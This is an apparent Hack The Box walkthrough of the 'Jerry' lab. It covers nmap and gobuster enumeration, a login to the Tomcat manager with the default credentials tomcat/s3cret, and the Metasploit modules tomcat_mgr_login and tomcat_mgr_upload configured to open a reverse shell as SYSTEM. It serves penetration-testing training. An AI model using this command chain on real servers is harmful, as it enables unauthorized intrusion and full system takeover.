First you need to copy the IP of the target machine - You can find it in your Hack The Box account. For this walkthrough the IP of the target is 10.129.238.159 but you will have a different one.
As usual let's start with nmap:
nmap -sC -sV 10.129.238.159
We are suggested to try -Pn so let's try:
nmap -sV -Pn 10.129.238.159
Port 8080 is open so let's open our browser and type in the url bar:
10.129.238.159:8080We get this website
As usual let's first do a gobuster to enumerate any hidden directories on this website. Type:
gobuster dir -u http://10.129.238.159:8080 -w /opt/useful/SecLists/Discovery/Web-Content/common.txt -x php
We can look into each of these directories but one that stands out is /manager so let's open our browser and type the following in the url bar:
10.129.238.159:8080/manager
We are prompted for a login. Let's try our luck and enter admin as username and admin as the password. We get the following error message:
Looks like there are some credentials here. tomcat as the username and s3cret as the password.
Let's try to login again but this time with tomcat and s3cret.
Open the browser and type in the url bar:
10.129.238.159:8080/managerBut this time we are unable to provide our login details and we go straight to the error message.
Let's clear our cookies, close the browser and try again!
This time we get the login page back, so let's enter tomcat as the username and s3cret as the password:
This time we are in!
Now let's google the following "Apache Tomcat Reverse Shell" and see what we can find. The first link seems interesting : https://vk9-sec.com/apache-tomcat-manager-war-reverse-shell/
Let's follow the steps in the article. Looks like they are using 2 metasploit exploits, one to get the credentials (which we already found) and a second exploit to get a shell on the target machine.
First we need to open Metasploit, so from your command prompt, type:
msfconsole
search tomcat
As recommended in the article, let's use auxiliary/scanner/http/tomcat_mgr_login so type:
use auxiliary/scanner/http/tomcat_mgr_login 
Type:
show options
For the exploit to work, we are required to provide the following:
RHOSTS - remote Host
RPORT - remote Port
set RHOSTS 10.129.238.159
set RPORT 8080
now let's run the exploit:
exploit
We get 1 Login Successful with username tomcat and password s3cret
Still following the article above, let's look for the second exploit:
search tomcat_mgr
use exploit/multi/http/tomcat_mgr_upload
show options
We need to provide RHOSTS (remote host) and RPORT (remote port) along with LHOST (local host) and LPORT (local port) for the exploit to work.
set RHOSTS 10.129.238.159set RPORT 8080set LHOST 10.10.14.10For LHOST we provide the IP of our machine. You can find it by opening a new command prompt window on your machine and type ifconfig
set LPORT 4444
Now that we have set up everything, let's run the exploit
exploit
ok it didn't work! that's because it needs a username and a password to access http://10.129.238.159:8080/manager
We found the username and the password earlier. Username is tomcat and password is s3cret so let's set that up too:
set HttpPassword s3cretset HttpUsername tomcat
exploit
Great! now we got the shell!
First type:
shell
whoami
We are nt authority\system which is a powerful account with unrestricted access to the system!
cd C:/
Flags are often in the C:\Users\Administrator\Desktop directory so let's type:
cd C:\Users\Administrator\Desktop
dir
cd flags
dir
type "2 for the price of 1.txt"
We got both the user flag and the root flag!
Don't forget to copy paste these flags and submit these flags in your Hack The Box account to be able to fully own the Jerry machine.
Comments